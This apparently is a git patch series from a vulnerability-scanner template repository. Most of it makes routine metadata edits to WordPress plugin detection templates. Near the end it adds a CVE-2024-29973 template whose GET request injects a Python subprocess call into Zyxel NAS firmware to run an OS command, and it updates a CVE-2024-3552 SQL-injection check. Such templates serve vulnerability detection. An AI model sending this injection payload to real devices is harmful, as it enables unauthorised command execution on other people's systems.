4a0a00473045022100e82e7575d92b5d9a1bce84ee2e75fb889dd9af4d961cb3ba491f16c085da91a9022076fd69d6952dc7d0081d69dd4af2a8795b11fdc7a48bebcba46d25759085ce75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 7501f3b9f7..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210088b02644f9e21b1e5994d3e0670f2d4b1f4106cc3c469b64cc2de01e666d094f022043ae76e41ec6fd18a5cd515a82a60aa40505c1e5e67c82222a06020fb947c6bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index b9ea4fdd0d..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008166cede67db17764dbd530ba12cf038bbce85178187b6cb948bb6996f57953702210080df5a422481d752743aeb68ad47d7497d55ec196fdd8322baa77c318f23f720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index a77b1b4914..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cdcaadb5426466a3aae3b8ce5a31568e31efe2efdc576657b91b85d8c2c4dd000220186b0a4e424ec09b90f9fa01d2a592731458c71c39dbc89e331899fdf0a0d753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 2ac0116912..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff5cd135acda1146a3109b128691bbc8cd37413038460f64361f9d20f826d2a702204ec261333b9860da4b1575718e8efd09996674dd728eec46961790b8d54f294f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 2a09775bb6..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033debe09d4702c4d57fff7b94e2b5694faa81301ba08be7e4ce414f26580be14022100e3b344cdbbd704dcd969c69b868f4305a34ef8e813dbb713cd1a102ebe88b33a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index d9be9f95b6..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005b52a1da378c04de722845182ea198a185779ee0473f7b7944d899bc06085d3022022516e5e2759167bf29a2f9e5208ad1c6145c98fa473d3c04bd4092c1b2c0f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 6212a640c7..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e8512ccacfea0e09dea3835b85ddb49beb14f215d0fcd6a0752c5b223e352562022045e4e136bc7aaf39dbba84f92e73ca783b61a459a0e93324880d3e67c7fea68d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index e40910f563..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022074d4182285a94a2b78af7909c6d81f90073a0f99db22e67ee1e7f9d396c9e2e602207a9687acd5b364316b78b802b9a5c0b784f56d9f9e07385ffd6d2cefd5197702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index a9acd3458e..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c49633e0a39e966d730e87d404341ee10e1425118f4adee0f87bf538b342bd7b022100e94036c40a1d4cf0a4cd2a3ab0f02b9ffb4b5dc75f4d66065d5a6be5dcee8b69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index bd116bed1c..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099c7dca2078280c067bad3e95b7de59de5efad94c54beb77b8827152d70045e402201fbf4f9f1270e4b982c69b16af31b002b04133adca0d4b268d1487d809dc7df4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 3ac85447d1..34115bcd0f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e56167aeff9d546c82be246c89c6defd5d52abb4deeabb81fa057210fec7d178022100808bab3c100a86a358fe32090ab43b78edb39558f71a953f38d5a11e4e4041f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 7bbf5ced54..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009158b8c348ef501b0b8673f2f735b55533d869a69c3f4bfe033e147279dad6b50221009e5aeb20b7d946df69b59423c556a1881e52c47d48918149a44b2c85dc01bd1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 66bbf8f424..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a9ddab4c541d0e3552c734c02c1940aba688feec8a17b31ddb6ff690e9aec0602203167fad55b82b8c87877c9de1653612c384a10c907dcc5f70e1ad4a952aec9bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index e7513b974d..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-reviews-plugin-for-google/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201a893a5b01e4280d8c497182f4c0b55fc896528d33e2c77717d2bde0bc454dc402204c20db52be14dc41ce256080a31b841ae40e2fc5a7bf14548d4c0559825d9bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index e61792b25e..c3ec4ebd80 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -1,19 +1,19 @@ id: wordpress-wp-rollback info: - name: WP Rollback Detection + name: WP Rollback – Rollback Plugins and Themes Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-rollback/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003a85bd293d01a3c018f794ad974e3b4c4b972aa2cd04d2ef81980453db845f102206b55d21712c5c982aa48b1711843665e1718545842908ac65dee4cd0093455a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index b6ded162c2..2276545093 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-seopress/ metadata: - max-request: 1 plugin_namespace: wp-seopress wpscan: https://wpscan.com/plugin/wp-seopress tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-seopress/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087d5e3726f83a6b4e743a79dc017fd8f26da1fa8b4601926d4f011d263d7ecea022100f70bddb64bc5f4f5bb06bc8420fd753c4c5e6dd25b7ededc7d2295b13a38e2d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 99ba88b853..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022015971eeb4aa17d4d1d1c3b3767452aa577574e41e8a17b67793481524a667b43022100c595fbb5fa55c25006be576cb41bc209bbbb413deda0029428a0a15df6aa604b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index f856df38b0..7b28bf7020 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -1,19 +1,19 @@ id: wordpress-wp-smushit info: - name: Smush – Optimize, Compress and Lazy Load Images Detection + name: Smush Image Optimization – Optimize Images | Compress & Lazy Load Images | Convert WebP | Image CDN Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206524cb6ac3a640a64f22a8081643e8872d1ba0d49434c09e16f0a162484565ec022100a65d2969d77712cc2c56adc9e34423922ecc541e8b5e2196ec2856bfc0b7caa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 507623f64a..da6abc2a81 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -1,19 +1,19 @@ id: wordpress-wp-statistics info: - name: WP Statistics Detection + name: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100adb886770d4608a4ab4339afe29d552a240ec65572d2027a5ad080a4a2497ae00220507fe61bbfd72b20f1633418aa8399cc53ec6e4f930a42d177130a2c4e42ca11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index c82b7ecf14..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097721f985b6e8fe850d2891e218773f2dd3def3fcb31ae72011a2fbb9888639b02204abf56bde7dde91b71d7760231a3fa6f9ad712cb0ac9fc958a2d11a8dfdfa356:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 3bd4a380e0..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203480073fc32f2ac7aff247b9808d0d7bf1d07f92fc367bdffe7a5d2f35ee4b74022100d3b9ae33a3dddf99c2d94c4076017a34348fdd876d37d71096f9fd04369842a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 0eac5aeb6f..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e4f7f59c16fe53bae95a24321341cd34a549aa0b8a5a5263e709d6b71d57593702207c9622383fb0c3504e9836856034ebd724d401294b011ac6e4afe70c24440781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index adb6010a40..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d07a96fa05799e4ea1905baf2623b729ff34042249611b1fc91eb46e52e5ae1702200c1107c50421986ea101839b5f150f8b5c8bdc963eb9cb0fc64a996226d30526:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 6f0b61f432..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100924c5e8afcef2d579a4da8c1d182dd28761976b0004b714957d8f7ac1437d83502201c30e2cffc530c0a53c577beba0d3efbc822d9ee9df46c99a96af2f3c8251432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 4cb5e18f77..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wpvivid-backuprestore/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022035e4dd2d12bf968a205f1543d38bfb9720916d2236fa06366a4315053226ad0e022100acd1d58f581639e1c4f7ded4a7457fee3a57c47a0d787accafe722f632a88142:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index b3ce66157d..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e12425f45ed5b647cb4b07b3633f6eade35419ae16767a7838ae4c409ea909530220096196e4ae01165510c765436eecb418917bd1653d0f8a7ebb40fe2df1defa1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1393afc208b71d5eb33850f55e0220629c48eb2e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 19 Jun 2024 10:47:57 +0530 Subject: [PATCH 0392/1841] minor update --- http/cves/2024/CVE-2024-3552.yaml | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index 31697d649c..81f373d274 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -11,10 +11,26 @@ info: - https://vulners.com/wpvulndb/CVE-2024-3552 - https://wpscan.com/vulnerability/34b03ee4-de81-4fec-9f3d-e1bd5b94d136/ metadata: + verified: true + max-request: 1 publicwww-query: "/wp-content/plugins/web-directory-free" - tags: wpscan,cve,cve2024,wordpress,wp-plugin,sqli + tags: cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free + +flow: http(1) && http(2) http: + + - raw: + - | + GET /wp-content/plugins/web-directory-free/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Web Directory Free' + - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 From 1c675c5a9fb15a44bc02dc7999e40ee316d2b1a6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 19 Jun 2024 11:52:08 +0530 Subject: [PATCH 0393/1841] Create CVE-2024-29973.yaml --- http/cves/2024/CVE-2024-29973.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-29973.yaml diff --git a/http/cves/2024/CVE-2024-29973.yaml b/http/cves/2024/CVE-2024-29973.yaml new file mode 100644 index 0000000000..1f5da07afe --- /dev/null +++ b/http/cves/2024/CVE-2024-29973.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-29973 + +info: + name: Zyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection + author: ritikchaddha + severity: critical + description: | + The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request. + reference: + - https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/ + - https://x.com/sirifu4k1/status/1803267896656929099/photo/1 + - https://nvd.nist.gov/vuln/detail/CVE-2024-29973 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.88 + cve-id: CVE-2024-29973 + cwe-id: CWE-78 + epss-score: 0.96901 + epss-percentile: 0.9971 + cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zyxel + product: nas326_firmware + tags: cve,cve2024,zyxel,rce + +http: + - raw: + - | + GET /cmd,/simZysh/register_main/setCookie?c0=’storage_ext_cgi+CGIGetExtStoInfo+and+False+or+_import_("subprocess").check_output("id",+shell=True)%23 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' + + - type: status + status: + - 200 From dc41d980ca6c121525e309c663696fd34c59fcfd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 19 Jun 2024 12:06:30 +0530 Subject: [PATCH 0394/1841] updated req --- http/cves/2024/CVE-2024-24112.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git 